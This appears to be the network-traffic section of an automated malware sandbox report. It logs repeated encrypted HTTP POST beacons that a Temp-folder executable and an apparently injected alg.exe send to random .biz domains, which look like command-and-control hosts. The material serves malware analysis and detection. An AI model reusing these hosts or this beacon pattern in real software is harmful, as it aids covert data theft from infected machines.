                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
Nov 18, 2024 09:56:50.390921116 CET | 844 | OUT | Data Raw: ac 8c d8 e0 f0 74 3a a5 40 03 00 00 0a 34 c3 12 f8 c2 40 2a 05 76 f7 39 1e ef e0 a8 1f fc e1 47 66 03 8a 35 41 ad b2 76 c5 71 0e f2 43 07 86 67 68 0e 61 42 cf 0e 7e de 13 c2 48 bf ab d5 98 e2 5f d2 72 5c 8c 9e ab e2 f6 e2 60 8a 8b 85 20 e2 3a cf
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: t:@4@*v9Gf5AvqCghaB~H_r\` :` 5JXuanQ19FFCLTy`z{NF5y<[7^w%^2"41m@@Li>9=n[eOyR8DYPr?PRx6?um)
Nov 18, 2024 09:56:51.372798920 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=4d4e51940d1812d6bf28f6fa38b7b0e7|155.94.241.187|1731920211|1731920211|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49888 | 18.141.10.107 | 80 | 2724 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:56:51.729011059 CET | 346 | OUT | POST /nyt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
Nov 18, 2024 09:56:51.729038000 CET | 844 | OUT | Data Raw: 36 3e fc 30 7c 4a 7e fa 40 03 00 00 d4 be f5 51 c8 03 7e e7 b9 e0 a5 45 a0 25 83 97 32 56 a8 ea 1e 7a e6 d8 8f 07 f7 72 11 8b 6d d5 1b 9b e0 fd dd 92 f8 b6 0d 3b 5b 93 6e 77 d4 57 e2 80 5f de d5 fd e3 f0 b0 33 71 b6 a5 4f d9 fa 5a 26 9e 34 61 55
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 6>0|J~@Q~E%2Vzrm;[nwW_3qOZ&4aUMO|9 plZ-f#yyfaoE3qo\j2dB%5aBBv.Un"V[<P>A=pi020X;lufJ
Nov 18, 2024 09:56:53.155417919 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=023f445160a5aecbadc813e8874d50d2|155.94.241.187|1731920212|1731920212|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49895 | 54.244.188.177 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:56:52.922804117 CET | 352 | OUT | POST /eoqitiy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:56:52.922847033 CET  778                OUT        Data Raw: 00 60 76 06 8c 4b 4a 07 fe 02 00 00 17 d6 d9 12 29 21 93 82 43 fc 7a f0 d4 9b 13 a9 ee 64 55 89 ae f8 f8 8c 9a 39 b5 de 59 50 ba b3 ff e5 8d 35 eb c0 f0 0d 42 98 a1 10 20 47 6b 3f fa 8d 14 88 a3 88 60 57 41 95 b8 7f 1b 4b c1 9c 9d 5e 3c 4b cf f0
Nov 18, 2024 09:56:53.715158939 CET  417                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=2c20daa257162b629b3ed00448848056|155.94.241.187|1731920213|1731920213|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.7  49899        54.244.188.177  80                2724  C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:56:53.417573929 CET  350                OUT        POST /iwtyrexju HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
Nov 18, 2024 09:56:53.417598963 CET  844                OUT        Data Raw: ef 8b d5 0b d8 0e c7 fb 40 03 00 00 7c 8b 4e f0 8e 6f 5f 01 4e de c8 23 ec 38 98 f8 12 e6 5a 6e 67 3c d0 e3 55 5c 68 b9 ae 51 ec fd 9d 51 66 26 8d 3a 48 73 18 2e 0f 71 bc 23 5d 46 2b a6 dd 85 a1 2b 54 23 d5 fc 57 b5 2d 96 b3 37 1c 5c 77 ba 5a 81
Nov 18, 2024 09:56:54.225683928 CET  413                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=c1d49555b512b627782e95e2d89f9192|155.94.241.187|1731920214|1731920214|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.7  49905        18.141.10.107   80                5368  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:56:54.621798992 CET  347                OUT        POST /jevf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:56:54.621834993 CET  778                OUT        Data Raw: 90 de d3 46 2b 33 a5 9f fe 02 00 00 1c c9 9c c7 80 a3 5e ea 0e b6 f0 e3 84 8d 18 38 ae 04 96 66 54 91 47 01 08 65 fb 5b 66 df 42 15 84 52 e6 87 6f 3f 40 8c 76 65 92 f9 2d b3 f8 20 94 7a 23 ff e8 62 7d da 99 93 7b 8a f5 0a 08 67 92 25 0a fd 13 d5
Nov 18, 2024 09:56:56.052212954 CET  415                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=7eb3bfe955667a10c6a5af51541a76c7|155.94.241.187|1731920215|1731920215|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.7  49906        44.221.84.105   80                2724  C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:56:54.674051046 CET  347                OUT        POST /ybu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
Nov 18, 2024 09:56:54.674068928 CET | 844 | OUT | Data Raw: ad 04 7b 51 0d 50 93 5b 40 03 00 00 73 79 d5 f0 76 f9 ca 67 89 30 03 4e e5 bc 1f 4b 7b c6 13 72 cf b8 49 91 21 c8 9d 4d 01 e1 95 10 b2 1b 8f 48 72 63 ed b7 47 1f 5c cc 90 1c e6 bd 09 5c 8d a2 a3 f3 27 49 7a cd 14 0e 7f 55 d9 43 d0 0c dc 9a c5 fe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: {QP[@syvg0NK{rI!MHrcG\\'IzUC`]sP\z^>*>bH.?oj_WCv0hrA:Tw=MM8"=zKYfcswc)N;N)m+_iu8*[4m3
Nov 18, 2024 09:56:55.322782040 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=7763ece23f2bcaef7732bdfe8ba46658|155.94.241.187|1731920215|1731920215|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49907 | 172.234.222.138 | 80 | 2724 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:56:55.390551090 CET | 346 | OUT | POST /bya HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
Nov 18, 2024 09:56:55.390551090 CET | 844 | OUT | Data Raw: a3 0d 29 39 90 e8 fb e2 40 03 00 00 86 97 65 12 cd 5f af f6 01 52 82 01 f8 a7 e8 87 eb 50 06 a3 4c 11 94 d6 ba f8 07 44 f5 d6 6a 6e 0c 4c a1 18 39 c4 eb f6 ed 54 20 17 60 fb ad cf 35 fd bb c5 99 05 94 d5 83 18 72 60 21 42 49 1f 7e 18 7e 4a c0 50
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: )9@e_RPLDjnL9T `5r`!BI~~JPO=WV)!G".tZDTVlbF!Utvj4S4ticMvXJq'U2Q*la`~f`rd+;2%8.|`;Z*UKGOcy4r=T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49913 | 172.234.222.138 | 80 | 2724 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:56:56.116128922 CET | 350 | OUT | POST /nchhums HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
Nov 18, 2024 09:56:56.116128922 CET | 844 | OUT | Data Raw: 36 9e 9c 6c 52 92 2a c9 40 03 00 00 fa 58 e7 88 f4 56 79 a8 0f fc dc fa 42 53 0f 92 11 d7 8a 83 e9 c0 b0 23 3a 89 61 9e 71 bb c0 37 7c 11 a6 f9 89 85 a7 4e bb 74 e2 8e 9c 4e 4b 4e e7 be 47 a9 18 f8 63 e4 0f 1b f8 e9 bc fe 22 79 41 14 f4 d3 b0 af
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 6lR*@XVyBS#:aq7|NtNKNGc"yA*Sn|eJ|}Sh>qOqzlx; APS*XN^GqN;+#.04K#\vZ#rJg*)Su2"`3cLA{1Pj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49914 | 54.244.188.177 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:56:56.134116888 CET | 348 | OUT | POST /chqlbpn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:56:56.134138107 CET | 778 | OUT | Data Raw: 4c 27 74 20 d1 4e 17 30 fe 02 00 00 2f 2e 3f be 09 be 53 e7 99 70 0d c0 34 4e 8a 20 61 01 45 84 5f 47 9a a5 5e dd b9 d2 1d 9c 39 7b 54 42 3e 4d ff be 4a 82 08 9e 68 4e 57 f0 ef 47 38 33 93 cf e1 8e 11 57 0f b6 5d 09 fa 53 0a 68 30 b1 c6 80 0e c1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: L't N0/.?Sp4N aE_G^9{TB>MJhNWG83W]Sh0+%ddLPe}O]:_%YX"\/NxugwJY\-f^H~ +Oon_=x6b29~i$xRB 3JY[b+!?G
Nov 18, 2024 09:56:56.975410938 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=452e48ff18449f8d2b7e30e5ea4fab3f|155.94.241.187|1731920216|1731920216|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49920 | 18.141.10.107 | 80 | 2724 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:56:57.140130997 CET | 358 | OUT | POST /lwhipkemtkmayb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
Nov 18, 2024 09:56:57.140155077 CET | 844 | OUT | Data Raw: c5 b2 cb 92 fb b4 21 bc 40 03 00 00 97 52 bd c4 e7 35 8e 22 41 c7 3e 2e 61 a8 5f 30 7d 9d f5 3d ae ad 18 7f f1 00 b7 f0 32 62 d1 64 0e 6d 36 6f 74 45 e4 88 df 5f ce 00 d4 90 ef a9 e9 5b 78 16 68 c4 22 37 d5 19 60 cd 5d e7 e2 ce 59 4c 20 8a 3a 9c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: !@R5"A>.a_0}=2bdm6otE_[xh"7`]YL :yxb;CK&=,WmsxZ/!QbG\L)H.CLNC4g_8}I^B&i 6:pg(6w~I(pCEE^dG


Session ID: 10 | Source IP: 192.168.2.7 | Source Port: 49923 | Destination IP: 44.221.84.105 | Destination Port: 80 | PID: 5368 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:56:57.500550032 CET | 346 | OUT | POST /nu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:56:57.500576019 CET | 778 | OUT | Data Raw: 39 e2 d0 39 94 2d 16 2e fe 02 00 00 e4 f6 eb c8 97 55 15 d8 06 68 a5 ae e1 5c 96 55 bb 5b b3 69 14 9f e7 b9 27 b7 a4 f8 4b 94 1a 7c d1 3d c0 2b ba d3 cc e3 4c 23 6d d7 62 91 3c 38 82 f4 ef 5d 31 bd 6d 11 24 67 fc 97 ac 8e 03 25 13 33 fd 24 8a 9d
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 99-.Uh\U[i'K|=+L#mb<8]1m$g%3$C3:=oeJ@}]:\OV0B"X$oc/-%{>,2xC/-PT2kH-uL4{GBP"vszcQ$`R/)w
Nov 18, 2024 09:56:58.163077116 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=bde7841cd3385191658a4c052b067d8e|155.94.241.187|1731920218|1731920218|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID: 11 | Source IP: 192.168.2.7 | Source Port: 49929 | Destination IP: 18.141.10.107 | Destination Port: 80 | PID: 2724 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:56:58.361669064 CET | 360 | OUT | POST /obevglctnlfkacjm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
Nov 18, 2024 09:56:58.361788988 CET | 844 | OUT | Data Raw: 2f 39 ce 25 4d 02 4a 6c 40 03 00 00 81 d7 6b 9b 06 d1 e0 ce 2e a6 07 10 1d 22 8c 50 5c 47 d4 c0 25 20 1c 1f bb 1d f5 07 81 f7 52 63 15 dd d3 92 f7 f5 85 14 fa 72 3a 05 57 d6 12 70 bf 0d 42 5e 35 82 46 2a a1 3e 9b dd 63 dd dc 41 fa 41 6e a2 b8 44
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: /9%MJl@k."P\G% Rcr:WpB^5F*>cAAnDwir_(g/XJOPd< 8;q\A.*UYX] 7]q{=*5IFXn+egQJS\6G/WX28Hh7R,-~/WBGf&."i
Nov 18, 2024 09:56:59.818535089 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=03f2927f2a80cdb53999fd255b607007|155.94.241.187|1731920219|1731920219|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID: 12 | Source IP: 192.168.2.7 | Source Port: 49930 | Destination IP: 172.234.222.138 | Destination Port: 80 | PID: 5368 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:56:58.832964897 CET | 354 | OUT | POST /ikqsakdpetf HTTP/1.1
